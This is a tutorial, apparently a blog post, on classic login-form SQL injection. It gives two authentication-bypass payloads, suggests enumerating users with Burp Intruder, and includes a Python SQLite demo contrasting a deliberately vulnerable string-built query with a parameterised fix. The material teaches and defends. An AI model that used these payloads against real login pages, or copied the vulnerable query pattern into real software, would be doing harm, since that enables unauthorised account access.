This kind of SQL injection occurs wherever a website has input fields, such as a search box, a login page, or a comment form, whose contents are passed into a database query.
Below is a screenshot of the login page I built to demonstrate classic login-based SQL injection.
The exact login query depends on the website or application, but for the login page above the backend query might look like this:
SELECT * FROM users WHERE user_name='$uname' AND password='$pass';
So what is happening behind the scenes?
Whatever the user types as the username and password goes straight into the query. The input is never validated, so an end user can submit anything they like, and that is what makes this login page vulnerable to SQL injection.
Now, how is it exploited?
Exploit 1 (when we know the username is "admin")
Let’s say I have entered,
Payload for username >> "admin' AND 1=1-- "
Payload for password >> "wfw"
So the resultant query will be:
SELECT * FROM users WHERE user_name='admin' AND 1=1-- ' AND password='wfw';
When the query is executed, the database looks for the username "admin" in the "users" table. If a row with that username exists, the login succeeds, because the remaining condition, 1=1, is always true. Two things follow: this payload only works if we know at least one valid username, and everything after "-- " is treated as a comment and is not executed (note the space after the two dashes: MySQL requires it for the comment marker to be recognised).
So the query actually executed by the database is:
SELECT * FROM users WHERE user_name='admin' AND 1=1;
And the part of the query that is treated as a comment is:
' AND password='wfw';
Because we know there is a user with the username "admin", the payload above logs us in as "admin".
Exploit 2 (when we don't know the username)
Let's say I have entered,
Payload for username >> "xyz' OR 1=1 LIMIT 0,1-- "
Payload for password >> "xyz"
So the resultant query will be:
SELECT * FROM users WHERE user_name='xyz' OR 1=1 LIMIT 0,1-- ' AND password='xyz';
The database searches the "users" table for the username "xyz" and finds no row with that name. Because the remaining condition, 1=1, is always true, the WHERE clause matches every row and the query would return all of them. We therefore add LIMIT 0,1 to restrict the result to a single row, which is what lets the login succeed.
So the query actually executed by the database is:
SELECT * FROM users WHERE user_name='xyz' OR 1=1 LIMIT 0,1;
And the part of the query that is treated as a comment is:
' AND password='xyz';
Using the above payload we are therefore logged in as the first user in the "users" table. To reach the "admin" user we have to step through the table by changing the LIMIT clause in the payload: LIMIT 0,1, LIMIT 1,1, LIMIT 2,1, LIMIT 3,1, and so on.
We can use the Burp Suite Intruder tool to brute-force this.
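The contrast this post draws, shown as an added example that is not part of the original post: a Python login check against an in-memory SQLite database. The post's backend is MySQL, but SQLite accepts the same "--" comment marker and the same LIMIT offset,count syntax, so both payloads above behave identically. The rows in the users table are constructed sample data. login_vulnerable interpolates the input into the query string exactly as the post's query does; login_safe is the fix, the same query with bound parameters, which turns the quote and comment characters into plain data the database never interprets as SQL. The plaintext password column is kept only to match the post's query; password storage is a separate topic.

```python
import sqlite3

# Constructed sample rows for the demonstration (not from the original post).
# Column order matches the post's query: user_name, password.
SAMPLE_USERS = [
    ("alice", "alice-pw"),
    ("admin", "s3cret"),
    ("bob", "bob-pw"),
]


def make_db():
    """Create an in-memory 'users' table populated with the constructed rows."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (user_name TEXT, password TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?)", SAMPLE_USERS)
    conn.commit()
    return conn


def login_vulnerable(conn, uname, pwd):
    """The flaw the post describes: user input is pasted into the SQL text.

    Returns the user_name of the first matching row, or None when no row matches.
    """
    query = f"SELECT * FROM users WHERE user_name='{uname}' AND password='{pwd}';"
    row = conn.execute(query).fetchone()
    return row[0] if row else None


def login_safe(conn, uname, pwd):
    """The fix: the same query with bound parameters.

    The driver sends the two values separately from the SQL text, so a quote or
    '--' inside them is compared as literal characters, never parsed as SQL.
    """
    query = "SELECT * FROM users WHERE user_name=? AND password=?"
    row = conn.execute(query, (uname, pwd)).fetchone()
    return row[0] if row else None


def enumerate_vulnerable(conn, count):
    """Walk the table with the post's LIMIT payload, one offset per attempt.

    Only the vulnerable function yields anything here; the same inputs against
    login_safe never match a row.
    """
    return [
        login_vulnerable(conn, f"xyz' OR 1=1 LIMIT {i},1-- ", "xyz")
        for i in range(count)
    ]


def demo():
    """Run both payloads from the post against both implementations."""
    conn = make_db()
    known_user_payload = "admin' AND 1=1-- "      # Exploit 1 from the post
    unknown_user_payload = "xyz' OR 1=1 LIMIT 0,1-- "  # Exploit 2 from the post
    results = {
        # Vulnerable: payload bypasses the password check entirely.
        "vuln_known_user": login_vulnerable(conn, known_user_payload, "wfw"),
        "vuln_unknown_user": login_vulnerable(conn, unknown_user_payload, "xyz"),
        # Safe: the payload is just an unknown username, so no row matches.
        "safe_known_user": login_safe(conn, known_user_payload, "wfw"),
        "safe_unknown_user": login_safe(conn, unknown_user_payload, "xyz"),
        # Safe still works for a genuine login.
        "safe_real_creds": login_safe(conn, "admin", "s3cret"),
    }
    conn.close()
    return results


if __name__ == "__main__":
    for name, who in demo().items():
        print(f"{name}: {who}")
    print("enumeration via vulnerable login:", enumerate_vulnerable(make_db(), 3))
```

Run it and the vulnerable function logs in as "admin" for the first payload and as the first row ("alice") for the second, while the parameterised version returns None for both and still accepts the real credentials. The point worth taking from the contrast is that the fix is not filtering quotes or dashes out of the input; it is keeping the input out of the SQL text altogether.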